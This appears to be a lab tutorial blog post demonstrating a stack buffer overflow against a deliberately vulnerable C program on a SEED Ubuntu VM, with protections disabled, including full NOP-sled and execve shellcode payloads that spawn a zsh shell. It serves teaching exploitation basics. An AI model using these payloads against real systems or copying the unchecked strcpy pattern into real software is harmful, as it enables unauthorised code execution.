Using Buffer Overflow to Execute Shell Code
By Matthew Loong
Introduction to Memory Allocation
Random Access Memory (RAM) consists, among others, a stack and a heap. Stack, which has high addressing and grows towards low addressing, is statically allocated via register pointers i.e. EBP, ESP, EIP. Heap, which has low addressing and grows toward high addressing, is dynamically allocated via functions like malloc() in C.
In this article, I will demonstrate how to exploit buffer overflow vulnerability on the stack, to firstly crash the code, and secondly execute a shell code.
Preliminary Set Up
The VM used is Seed Ubuntu 12.04.
Before any execution, address space layout randomization (ASLR) must be disabled. ASLR is a protection to randomize stack memory allocation so that an attacker is unable to capitalize on the characteristic of ordered stack memory to overflow the buffer. In this case, 2 indicates that ASLR is enabled, setting it to 0 will disable it.
Compiling the Vulnerable Script
For this demonstration, we compile a C program called vuln.c, shown below, that is vulnerable, because it uses the function strcpy(), which does not check the buffer length before copying over the string. If the destination is not long enough to accommodate the string, behavior is unspecified and may cause the program to crash i.e. buffer overflow.
/*vuln.c*/
#include <stdio.h>
#include <string.h>
int main (int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
We include the command ‘-fno-stack-protector’ while compiling to disable stack smashing protector. If the protector is not disabled, our buffer overflow attack code and script would be terminated upon execution with a “stack smashing detected” error code returned.
Running disas main in debugger, we see that the ESP is at $0x1fc, which is decimal 508 bytes offset subtracted from the EBP address.
Stack Smashing
When initially copying the string 'Hello' into the buffer, the program exits without error because the buffer is able to accommodate the string. But when $(python -c 'print "\x41" * 508') is run, then buffer of 500 bytes is exceeded and the string encroaches beyond its buffer, causing segmentation fault. The diagram below represents the two respective scenarios.
Executing Shell Code
Before we proceed further, we need to understand what a No Operation (NOP) sled is. A NOP sled is a long sequence of instructions preceding the shell code, it is often included as part of an exploit to increase the likelihood of the exploit succeeding. It is meant to slide the instruction execution flow to its final, desired destination whenever the program branches to a memory address anywhere on the slide.
Running the initial script, $(python -c 'print "\x90" * 426 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x51\x51\x51\x51" * 10')
And examining using, x/200x ($esp - 550), we get the following result.
Since the total buffer space is 508 bytes, by counting, the shell code is 43 bytes and the padding is 4 x 10 = 40 bytes. Hence, the number of bytes to reach the return address is 508 - 43 - 40 = 425. To jump to shellcode, we need to choose an EIP address that points to NOP sled (\x90). To have a comfortable room to play, we pick an address somewhere in the middle i.e. 0xbffffaea, which in Little Endian is \xea\xfa\xff\xbf.
Running the new script, $(python -c 'print ("\x90" * 425) +"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+("\xea\xfa\xff\xbf"*10)')
We get the zsh shell.
The diagram below represents what is happening in the stack. The EIP points to NOP sled, which in turn jumps to shell code.
Conclusion
The demonstration above is only one of the shell codes that can be executed. There are many others for different purposes, even to obtain root. You can find these shell codes in the links below.
Love your posts Matt, I used to study assembly and reverse coding way back in the day so reading this one took me back to those days. Finding weakness in programs by inserting no operation code was always a favorite.